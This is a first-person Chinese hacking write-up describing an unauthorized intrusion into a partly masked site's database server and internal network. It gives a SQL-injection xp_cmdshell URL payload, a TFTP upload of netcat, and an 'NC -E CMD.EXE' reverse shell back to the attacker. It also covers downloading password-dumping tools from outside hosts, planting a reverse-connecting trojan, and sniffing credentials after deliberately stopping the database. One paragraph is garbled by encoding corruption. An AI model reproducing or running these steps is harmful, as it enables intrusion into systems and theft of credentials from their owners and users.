记一次艰苦的入侵- -

来源：互联网发布：下拉框二级联动 js数组编辑：程序博客网时间：2024/05/22 06:27

04年不平凡的一年，各种漏洞相继发现，各种入侵技巧也应运而生，原本固若金汤的机器，在新的漏洞面前，也变的弱不禁风。牛人发现并编写的Serv-u的溢出程序，为提升系统权限大开方便之门，NBSI把SQL注入发挥的淋漓尽致，PHP注入也日趋成熟，哪位怪才发现的上传漏洞在很多脚本中也都花样倍出，像DV，DZ等等大名鼎鼎的论坛也是漏洞叠报，数家著名公司被敲诈，黑客组织也是明争暗斗，虚拟主机也饱受旁注困扰。攻与防就像矛与盾，从某种意义上来说，攻就是防，防就是攻！

“千里之堤，溃于蚁穴”，一个小小的漏洞就可以攻克一台机器，甚至占领整个内部网络。本文以一台机器为突破口，然后如何利用内网其它机器做跳板，最后控制目标机器（如果说利用一台机器上的某个站点来控破渌镜憬兄苯优宰⒌幕埃枷氚牙猛煌谧钊醯囊惶ɑ鳎创锏娇刂谱钋康幕鹘形式优宰ⅲ壬溉肭峙季踝藕锰悖涫捣椒ê芏嗯Ｈ嗽缬美昧耍荚谡饫锵殖罅耍?/DIV>

一、通过SQL注入漏洞，反向连接数据库机器。

利用NBSI扫描发现存在SQL注入漏洞，而且还是SA权限，如图1

图1

利用NBSI的DOS执行命令，输入ipconfig –all 发现网址与WEB服务器不同，但是从网关上来看是在同一网段内。执行netstat –an查看数据库服务器所开的端口，发现很多1433端口都是WEB服务器连接，21，23，80端口没！利用NBSI的浏览目录功能，没发现机器上存在PCANYWHERE和SERV-U（利用它们可以远程控制，提升权限，或猜测口令）。利用net start 命令没发现如瑞星，KV等杀毒软件或_blank">防火墙服务，然后利用HSCAN1。2和NMAP3。7扫描数据库服务器的外网IP进，竟然没扫到一个开放的端口！（估计机器上装了硬件_blank">防火墙！）对付_blank">防火墙，偶想到了反向链接，在本地开了一个TFTP，利用命令， tftp –I ip get nc.exe 很幸运的上传了一个NC上去，利用同样的方法也上传了一个MT。EXE（MT.EXE是一个网络管理方面的软件,依照yy3的说法,也就是 "七拼八凑来的，纯粹是图个方便。"可是这个方便个真的是太方便了,仅40K的一个程序，但是集合了近四十种的命令于一身）上去。也可以利用FTP命令，把FTP命令用ECHO命令写进一个文件里面，最后在用FTP –S：FILENAME来实现文件的下载。在本机利用NC监听66端口，命令如下：NC –L –P 66 ，远程机器上执行：NC –E CMD。EXE IP 66不一会儿，一个SHELL就出来了（还是在这里面运行命令爽啊，在NBSI里憋死了，有时在NBSI里执行命令时会出现“意外数据”，还要被破在游览器里执行_cmdshell%20'dos">http://www.***.com.tw/***/***.asp? mode=1&ID=256;exec%20master..xp_cmdshell%20'dos command';--）利用net view 命令查看共有三台机器！如图2

图2

[NextPage]

在利用命令：NET VIEW //机器名时得到的内容为空，看来是没共享目录啊！
二、上传反弹、监听木马显奇功。

利用MT。EXE –SYSINFO命令显示出数据库服务的系统信息，网卡信息，配置信息，和所安装的软件信息。如图3（只截了系统信息）

图3

是WIN2003怪不得用MT –FINDPASS命令没显出密码来，它只显示的2K的密码。利用命令mt –netget http://www.***.com/findpass2003.exe（mt -netget <url> <filename to saved> ---Download from http/ftp.）下载到本地一个看WIN2003密码的软件！！运行findpass2003.exe后没有在内存中找到密码！（看来的想办法让管理员登录了！哈哈）

运行命令： mt –netget http://www.***.com/hacan120.rar hscan.rar 下载一个HSCAN1。2进去，利用同样的方法又下载进去一个UNRAR。EXE然后执行命令：unrar.exe x hscan.rar 这样就把HSCAN。RAR解压到HSCAN目录当中了！可以利用HACSN1。2版本的DOS命令进行内网扫描，命令如下：hscan -h www.target.com -all –ping扫完其余两台以后没发现任何弱口令，但发现它们在内网中开了很多端口，如：21，80，135，139，3389 等

注意：HSCAN扫描完了以后，会生成报告，自动用浏览器打开，应该利用MT –PSLIST 和MT –PSKILL把这个浏览器关掉！

即然开了3389能不能利用端口重定向，把它定向到数据库这台机器上呢，经过实践利用mt -redirect <TargetIP> <TargetPort> <ListenPort> ----TCP port redirector. 和利用FPIPE都没有成功（定向后，用NETSTAT –AN命令看是端向成功，但是在外网还是没法访问）哪数据库这台机器能不能利用带反弹型的图形木马来控制屏幕呢？实践证明利用神气儿，灰鸽子，溯雪都失败了！看来只能装DOS版的后门了，哪试试APR欺骗如何？因在DOS下没法安装图形界面的WINPCAP，所以ARPSINFFER。EXE无法运行！（后来自己做了一个DOS版的）

这台机器上除了操作系统，数据库，WIN2003补丁外什么都没装，难道真的就没有办法了吗？这时偶想到了一个木马，一个女黑客编写的，即有反向连接功能，又有监听功能，是什么呢？聪明的朋友，你猜到了吗？她就是大名鼎鼎，如雷贯耳，威名远波，无所不知的WOLLF（偶好喜欢她啊！哈哈）运行WOLLF –SETUP后做一个反向链接的木马，偶选择的是反向链接所取的IP放在一个HTTP空间的文件中！制作好后，同样利用MT。EXE –NETGET命令下载到数据库服务器当中，运行后，它会自动向你的HTTP空间中存放的文件中去取反向链接的IP和端口，这时你可以在本机上用NC –L –P PORT 慢慢等待，一会以后，反向连接成功了，输密码进入吧！如图4

图4

[NextPage]

进入后，执行命令：SNIFF <Log_file> (她可以监听 ftp/smtp/pop3/http四种密码经过网卡的 )findpass2003.exe不是还没找到密码吗?这时候,利用MT.EXE –PSKILL命令把它的数据库停掉，偶就不信管理员不来！在WOLLF环境下执行EXIT退出（但是监听程序还是在运行的，如果执行QUIT后，就不监听了），累死偶了，睡觉去了！

一觉醒来，太阳都老高了，睡懒觉可真舒服啊！在倒连上去看看有没有抓到有价值的信息，先输入命令：SNIFF_STOP把监听停下，在利用WOLLF带的GET命令把监听的文件下载下来，哈，收获可真不小如图5所示：

图5
图5所示监听到固若金汤的WEB服务器的一个80端口的用户名和密码，登录上一看，原理是一个会员的！还监听到一台机器的21端口的用户名和密码了和这台机器的25端口的一个MAIL，查看其IP后发现它就是上面利用NET VIEW看到的三台机器中的一台，就叫它“邮件WEB服务器”吧，在外网扫描还发现它开了80端口！看来这台机器有两个作用：一是作为邮件服务器，另一个作用就是开了80端口，上面放了部网站内容，而主要网站的内容则在哪台固若金汤的WEB服务器上（在外网扫描它进，只开了80端口，真够狠！哪台邮件WEB服务器对外网也仅开了21，25，80，110四个端口）先别忙登录啊！可不要忘了哪个findpass2003命令啊！如图6：